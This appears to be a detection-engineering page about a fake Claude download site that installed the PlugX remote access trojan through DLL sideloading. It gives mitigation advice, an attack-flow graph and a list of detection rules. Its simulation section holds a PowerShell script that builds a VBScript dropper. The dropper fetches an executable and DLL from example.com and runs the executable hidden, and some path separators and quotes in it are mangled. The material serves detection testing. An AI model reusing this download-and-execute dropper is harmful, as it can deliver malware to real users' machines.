Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Attackers set up a fake Claude download page that delivered a trojanized ZIP archive to unsuspecting users. Once opened, the archive installed a seemingly legitimate Claude desktop client while covertly deploying the PlugX remote access trojan through DLL sideloading with a signed G DATA updater. The malicious payload was placed in the user’s Startup folder to maintain persistence and then initiated outbound HTTPS communication with a command-and-control server. The campaign shows how threat actors are increasingly exploiting interest in popular AI tools as a social engineering lure for initial compromise.
Investigation
During analysis, researchers unpacked the ZIP archive, identified the MSI installation path, and followed execution to a VBScript dropper that wrote NOVUpdate.exe, a malicious avk.dll, and an encrypted data file into the Startup folder. Sandbox execution confirmed that the sideloaded binary launched successfully, altered a TCP/IP-related registry key, and initiated outbound connections over port 443 to an Alibaba Cloud-hosted IP address. These findings confirmed the delivery of PlugX through a staged infection chain disguised as legitimate AI software.
Mitigation
Users should download Claude software only from verified official sources and validate the authenticity of installer packages before execution. Defenders should inspect Startup folders for unexpected binaries or DLLs, especially files that mimic legitimate update components. Firewall and endpoint telemetry should also be reviewed for suspicious outbound HTTPS traffic tied to newly installed applications. Removing the malicious files, reversing any unauthorized registry changes, and running a trusted anti-malware scan are key steps to contain the threat.
Response
Security teams should detect and alert on the presence of NOVUpdate.exe, avk.dll, or NOVUpdate.exe.dat within the Startup directory. Additional detections should focus on signed G DATA updater binaries loading untrusted DLLs and establishing unexpected outbound TLS sessions to the identified infrastructure. Affected hosts should undergo full remediation and forensic review to confirm that no other PlugX components, persistence mechanisms, or follow-on payloads remain active.
"graph TB %% Class definitions classDef technique fill:#ffdd99 classDef file fill:#c2f0c2 classDef script fill:#d9d9ff classDef process fill:#f0c2c2 classDef persistence fill:#ffd9b3 classDef c2 fill:#b3e5fc classDef evasion fill:#e6b3ff classDef registry fill:#ffe699 %% Nodes u2013 Files and Artifacts node_spoofed_website["<b>File</b> – Spoofed Claude website<br/>Hosts malicious ZIP"]:::file node_malicious_zip["<b>File</b> – Malicious ZIP<br/>Contains trojanized MSI installer"]:::file node_msi_installer["<b>File</b> – Trojanized MSI installer"]:::file node_vbscript["<b>Script</b> – Claude AI.vbs<br/>Copies files, launches Claude, sets persistence"]:::script node_novupdate_exe["<b>File</b> – NOVUpdate.exe<br/>Legitimate G DATA updater used for DLL sideloading"]:::file node_avk_dll["<b>File</b> – avk.dll<br/>Malicious DLL loaded by updater"]:::file node_dat_file["<b>File</b> – NOVUpdate.exe.dat<br/>Encrypted payload"]:::file node_startup_folder["<b>File</b> – Startup folder<br/>Destination for copied files"]:::file node_shortcut["<b>File</b> – Claude AI.lnk<br/>Desktop shortcut that runs the VBScript"]:::file node_cleanup_batch["<b>File</b> – cleanup.bat<br/>Deletes malicious artifacts after execution"]:::file node_registry_key["<b>Registry</b> – HKLM\System\CurrentControlSet\Services\Tcpip\Parameters"]:::registry %% Nodes u2013 Techniques node_initial_access["<b>Technique</b> – T1204.002 User Execution<br/>Victim downloads malicious ZIP from spoofed site and runs MSI"]:::technique node_execution["<b>Technique</b> – T1059.005 Visual Basic<br/>Executes malicious VBScript"]:::technique node_persistence_startup["<b>Technique</b> – T1037.005 Startup Items<br/>Copies files to Startup folder"]:::persistence node_persistence_shortcut["<b>Technique</b> – T1547.009 Shortcut Modification<br/>Creates then replaces desktop shortcut"]:::persistence node_appcert_dll["<b>Technique</b> – T1546.009 AppCert DLLs<br/>DLL sideloading via G DATA updater"]:::evasion node_obfuscation["<b>Technique</b> – T1027.009 Obfuscated Files<br/>Encrypted .dat payload decrypted at runtime"]:::evasion node_registry_mod["<b>Technique</b> – T1012 Query Registry<br/>Modifies TCP/IP parameters"]:::registry node_c2_proxy["<b>Technique</b> – T1090.002 Proxy External Proxy<br/>HTTPS outbound via proxy"]:::c2 node_c2_web["<b>Technique</b> – T1102 Web Service<br/>Communicates over HTTPS web service"]:::c2 node_indicator_removal["<b>Technique</b> – T1070.010 Indicator Removal<br/>Batch file deletes dropper script and itself"]:::evasion %% Flow Connections node_spoofed_website –>|hosts| node_malicious_zip node_malicious_zip –>|delivered via| node_msi_installer node_msi_installer –>|drops| node_vbscript node_msi_installer –>|drops| node_novupdate_exe node_msi_installer –>|drops| node_avk_dll node_msi_installer –>|drops| node_dat_file node_initial_access –>|leads to| node_msi_installer node_vbscript –>|executes| node_execution node_execution –>|enables| node_persistence_startup node_execution –>|creates| node_shortcut node_persistence_startup –>|copies to| node_startup_folder node_startup_folder –>|contains| node_novupdate_exe node_startup_folder –>|contains| node_avk_dll node_startup_folder –>|contains| node_dat_file node_persistence_shortcut –>|creates| node_shortcut node_persistence_shortcut –>|replaces with clean| node_shortcut node_appcert_dll –>|loads| node_avk_dll node_obfuscation –>|decrypts| node_dat_file node_registry_mod –>|modifies| node_registry_key node_c2_proxy –>|uses| node_c2_web node_indicator_removal –>|creates| node_cleanup_batch node_cleanup_batch –>|deletes| node_vbscript node_cleanup_batch –>|deletes| node_msi_installer %% Class Assignments class node_initial_access technique class node_execution technique class node_persistence_startup persistence class node_persistence_shortcut persistence class node_appcert_dll evasion class node_obfuscation evasion class node_registry_mod registry class node_c2_proxy c2 class node_c2_web c2 class node_indicator_removal evasion "
Attack Flow
Detections
LOLBAS WScript / CScript (via process_creation)
View
Possible Timeout Usage for Delay Execution (via cmdline)
View
Suspicious Binary / Scripts in Autostart Location (via file_event)
View
IOCs (HashSha256) to detect: Fake Claude site installs malware that gives attackers access to your computer
View
IOCs (SourceIP) to detect: Fake Claude site installs malware that gives attackers access to your computer
View
IOCs (DestinationIP) to detect: Fake Claude site installs malware that gives attackers access to your computer
View
Detect WScript Dropping and Executing NOVUpdate.exe [Windows Process Creation]
View
Fake Claude Site Trojanized Installer Detection [Windows File Event]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
An attacker crafts a malicious VBS script that downloads the payloadNOVUpdate.exefrom a command‑and‑control (C2) server, writes it to%TEMP%, and then launches it viawscript.exe. The same script also loadsavk.dllfrom the same location to achieve DLL sideloading. The attacker relies on the built‑in Windows Script Host (WSH) to avoid raising suspicion from traditional AV heuristics.- Write the malicious VBS file (
malicious.vbs) to%TEMP%. - Invoke
wscript.exewith the path to the VBS file. - The VBS script performs an HTTP GET to fetch
NOVUpdate.exeandavk.dll, writes them to disk, and executesNOVUpdate.exe.
- Write the malicious VBS file (
-
Regression Test Script:
# -------------------------------------------------------------------- # Malicious dropper simulation – triggers the Sigma rule # -------------------------------------------------------------------- $tempDir = "$env:TEMPDropperDemo" New-Item -ItemType Directory -Path $tempDir -Force | Out-Null # 1. Create malicious VBS that downloads two files and runs NOVUpdate.exe $vbsPath = "$tempDirmalicious.vbs" $vbsContent = @" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.open "GET", "http://example.com/NOVUpdate.exe", False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject("ADODB.Stream") objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile "$tempDirNOVUpdate.exe", 2 objStream.Close End If
‘ Download avk.dll (used for DLL sideloading) objXML.open “GET”, “http://example.com/avk.dll“, False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject(“ADODB.Stream”) objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile “$tempDiravk.dll”, 2 objStream.Close End If
‘ Execute the dropped EXE CreateObject(“WScript.Shell”).Run “””$tempDirNOVUpdate.exe”””, 0, False “@ Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII
# 2. Run the script via wscript.exe (this is the telemetry we are testing)
$wscript = "$env:SystemRootSystem32wscript.exe"
Start-Process -FilePath $wscript -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden
# OPTIONAL: pause to allow detection to fire
Start-Sleep -Seconds 10
# --------------------------------------------------------------------
```-
Cleanup Commands:
# Remove all artefacts created by the simulation $tempDir = "$env:TEMPDropperDemo" if (Test-Path $tempDir) { Remove-Item -Path $tempDir -Recurse -Force } # Ensure any lingering NOVUpdate.exe processes are terminated Get-Process -Name "NOVUpdate" -ErrorAction SilentlyContinue | Stop-Process -Force